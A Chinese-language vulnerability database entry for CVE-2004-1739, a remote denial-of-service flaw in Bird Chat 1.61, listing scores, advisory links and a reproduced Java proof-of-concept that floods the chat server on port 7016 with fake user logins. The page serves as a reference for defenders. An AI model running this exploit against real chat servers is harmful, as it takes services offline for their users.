CVE-2004-1739
CVSS5.0
发布时间 :2004-08-23 00:00:00
修订时间 :2016-10-17 23:00:14
NMCOE    

[原文]Bird Chat 1.61 allows remote attackers to cause a denial of service (crash) via invalid users.


[CNNVD]Bird Chat远程服务拒绝漏洞(CNNVD-200408-212)

        Bird Chat 1.61版本存在漏洞。远程攻击者借助无效的用户导致服务拒绝(崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1739
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1739
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-212
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109327938924287&w=2
(UNKNOWN)  BUGTRAQ  20040823 DoS in Bird Chat 1.61
http://www.autistici.org/fdonato/advisory/BirdChat1.61-adv.txt
(UNKNOWN)  MISC  http://www.autistici.org/fdonato/advisory/BirdChat1.61-adv.txt
http://www.securityfocus.com/bid/11010
(VENDOR_ADVISORY)  BID  11010
http://xforce.iss.net/xforce/xfdb/17080
(VENDOR_ADVISORY)  XF  bird-chat-dos(17080)

- 漏洞信息

Bird Chat远程服务拒绝漏洞
中危 其他
2004-08-23 00:00:00 2005-10-20 00:00:00
远程  
        Bird Chat 1.61版本存在漏洞。远程攻击者借助无效的用户导致服务拒绝(崩溃)。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (420)

Bird Chat 1.61 - Denial Of Service (EDBID:420)
win32 dos
2004-08-26 Verified
0 Donato Ferrante
N/A [点击下载]
/*
    Bird Chat 1.61 - Denial Of Service - Proof Of Concept
    Coded by: Donato Ferrante
*/



import java.net.Socket;
import java.net.InetAddress;
import java.net.ConnectException;
import java.net.SocketTimeoutException;
import java.io.OutputStream;
import java.io.InputStream;







public class BirdChat161_DoS_poc {



private final static int MAX_CONNECTION = 16;
private final static int PORT = 7016;
private final static String VERSION = "0.1.0";



public static void main(String [] args){



  System.out.println(
                     "\n\nBird Chat 1.61 - Denial Of Service - Proof Of Concept\n" +
                     "Version: " + VERSION + "\n\n"                 +
                     "coded by: Donato Ferrante\n"                  +
                     "e-mail:   fdonato@autistici.org\n"            +
                     "web:      www.autistici.org/fdonato\;n\n"
                    );


    String host = "localhost";

        try{

            if(args.length != 1)
                usage();

                host = args[0];

        }catch(Exception e){usage();}
    
        try{


            int i = 1,
                var = 0;


           while(i++ <= MAX_CONNECTION){

            try{

               String err = "";
               int port = PORT;
               InetAddress addr = InetAddress.getByName(host);
               Socket socket = new Socket(addr, port);
               socket.setSoTimeout(3000);



               InputStream stream = socket.getInputStream();

                  int line = stream.read();
                   while(line != -1){

                       if(line == '?'){
                           break;
                       }

                       line = stream.read();

                   }


               OutputStream outStream = socket.getOutputStream();
               outStream.write(("*user=fake_user0" + ++var + "\n").getBytes());


                int count = 0;
               line = stream.read();
                    while(true){

                       line = stream.read();

                        if(line == '\n')
                           count++;

                       if(count >= 3)
                           break;
               }


            }catch(SocketTimeoutException ste){break;}
            catch(ConnectException ce){System.err.println(ce); continue;}
        }


        }catch(Exception e){System.err.println(e);}

        System.out.println("\nBird Chat - Denial Of Service - Proof_Of_Concept terminated.\n\n");
    }







    private static void usage(){

        System.out.println("Usage: java BirdChat161_DoS_poc <host>\n\n");    
        System.exit(-1);
    }
}


// milw0rm.com [2004-08-26]		

- 漏洞信息

9142
Bird Chat Spoofed User Flood DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-08-23 Unknow
2004-08-23 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站